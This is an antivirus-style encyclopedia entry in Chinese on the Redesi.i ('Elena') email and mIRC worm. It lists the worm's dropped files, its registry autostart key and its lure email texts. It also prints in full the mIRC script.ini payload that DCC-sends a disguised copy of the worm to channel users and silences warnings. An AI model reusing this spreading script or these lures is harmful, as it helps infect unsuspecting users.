当前位置: 王朝网络 >> other >> Worm.Redesi.i

Worm.Redesi.i

王朝other·作者佚名 2008-08-14

窄屏简体版字體: 小|中|大|超大

病毒名称(中文):

红丝带变种I

病毒别名:

I-Worm.Redesi.i[AVP],I-Worm/Redesi.i[KV],Worm.Re

威胁级别:

★★☆☆☆

病毒类型:

蠕虫病毒

病毒长度:

40960

影响系统:

Win9xWinNT

病毒行为:

这是一个通过电子邮件和mIRC聊天系统传播的蠕虫病毒。该病毒发作的时候将7个病毒副本和1张名为“Elena”的照片拷贝到C盘根目录下，在注册表中添加启动项，实现病毒的开机自启动。通过修改mIRC的脚本配置文件script.ini的内容，使得病毒能够通过mIRC来传播。该病毒在OutlookExpress的地址薄里收集邮件地址，再将病毒做为附件发送出去，该邮件极具欺骗性，用户很可能会受骗而去打开附件，从而感染该病毒。

病毒释放的8个文件（7个病毒副本和1张Elena的照片）：

1)在C盘根目录下释放以下文件：

C:\elena.jpg（一人物图片）

C:\elena.scr（病毒副本）

C:\YouandMe.exe（病毒副本）

C:\Me.pif（病毒副本）

C:\Mylove.pif（病毒副本）

C:\myfullpicture.scr（病毒副本）

C:\aboutme.exe（病毒副本）

C:\you.exe（病毒副本）

2)在注册表中添加启动项：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

(Default)="C:\me.pif"

3)取下面的某一行做为邮件主题：

Heybaby!

Shemakesmefeelaliveherpowermorethanwordscansay.

Sendsshiversthroughmyperson,clearsmyheadtofacetheday.

Can"twesortthisout?

Iwaswrong,I"msorry.

IknowIwasabitch

Webelongtogether

Can"tresist,thatswherewewentwrong.

Iheartheoceanbeatupontheshoreoutsidemyroom.

Callingmeupfromsleeptolistentohergracefulltune.

It"sgonnabealovelyday.

Don"taskmewhatIsmoke.ButIdrinktogetdrunk.

Ikeptwatchingthewayyoumove.

SeasideAtmosphere.

Twopeople,barelytocuhingeachother.

4)取下面的某一段做为邮件的正文：

Heybaby

SorryIwassuchabitchtoyou.Istherenowaywecansortthisout?

Thelastfewdayshavebeenhellwithoutyou...Imissyou

I"veattachedapicture...thoughtyoumightlikeit.

Pleasecallme!

Allmylove.Elena

Heydarlin

I"llbehomeinafewdays,can"twaittoseeyouagain;-)

AttachedapicturewetookonSaturdayatGatecrasher.Loveya

Elena=x=

Hisexy.

WenttoGatecrasheronSaturday,itwasabsoultlybrilliant!!!

hereisapictureofmebythebar(asusualheh)

Behometommorrow.

LoveElena

5)向mIRC的脚本配置文件script.ini中写入以下内容，使得病毒能够通过mIRC来传播：

[script]

n0=on1:JOIN:#:{

n1=.msg$nickHey.checkoutmypictureandletmeknowwhatyouthink.Youllbepleasantlysuprised.

n2=.copyC:\elena.scrC:\mirc\MyFullpic.jpg.pif

n3=.dccsend$nickC:\mirc\MyFullpic.jpg.pif

n4=}

n5=on1:text:*script.ini*:?:/.ignore$nick

n6=on1:text:*virus*:?:/.ignore$nick

n7=on1:text:*worm*:?:/.ignore$nick

n8=on1:text:*script.ini*:#:/.ignore$nick

n9=on1:text:*virus*:#:/.ignore$nick

n10=on1:text:*worm*:#:/.ignore$nick

n11=on1:text:*redesi*:#:/nickElena_MM

n12=on1:text:*elena*:#:/nickI_got_worms

n13=on1:text:*sex*:#:/nickElena_worm

n14=on1:text:*cyber*:#:/nickWin32_Elena

n14=on1:text:*e*:#:/meThinksElenaisstunning.

n14=on1:text:*a*:#:/join#teamvirus

n14=on1:text:*s*:#:/saymynextwormwillbecalledZorprobably:)

n14=on1:text:*i*:#:/join#teamvirus

n14=on1:text:*hey*:#:/sayW32.Elena,byGobo

点击展开全文

上一篇：Worm.Buchon.b

下一篇：Worm.Badtrans.b

免责声明：本文为网络用户发布，其观点仅代表作者个人观点，与本站无关，本站仅提供信息存储服务。文中陈述内容未经本站证实，其真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。

没有找到您想要的？点此查看更多相关文章
相关文章▶

2023年上半年GDP全球前十五强
百态 2023-10-24

美众议院议长启动对拜登的弹劾调查
百态 2023-09-13

上海、济南、武汉等多地出现不明坠落物
探索 2023-09-06

印度或要将国名改为“巴拉特”
百态 2023-09-06

男子为女友送行，买票不登机被捕
百态 2023-08-20

手机地震预警功能怎么开？
干货 2023-08-06

女子4年卖2套房花700多万做美容：不但没变美脸，面部还出现变形
百态 2023-08-04

住户一楼被水淹还冲来8头猪
百态 2023-07-31

女子体内爬出大量瓜子状活虫
百态 2023-07-25

地球连续35年收到神秘规律性信号，网友：不要回答！
探索 2023-07-21

全球镓价格本周大涨27%
探索 2023-07-09

钱都流向了那些不缺钱的人，苦都留给了能吃苦的人
探索 2023-07-02

倩女手游刀客魅者强控制（强混乱强眩晕强睡眠）和对应控制抗性的关系
百态 2020-08-20

美国5月9日最新疫情：美国确诊人数突破131万
百态 2020-05-09

荷兰政府宣布将集体辞职
干货 2020-04-30

倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观：鹏程万里
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案神机营：射石饮羽
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山：拔刀相助
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案天工阁：鬼斧神工
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道：单枪匹马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：与虎谋皮
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：李代桃僵
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：指鹿为马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：小鸟依人
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：千金买邻
干货 2019-11-12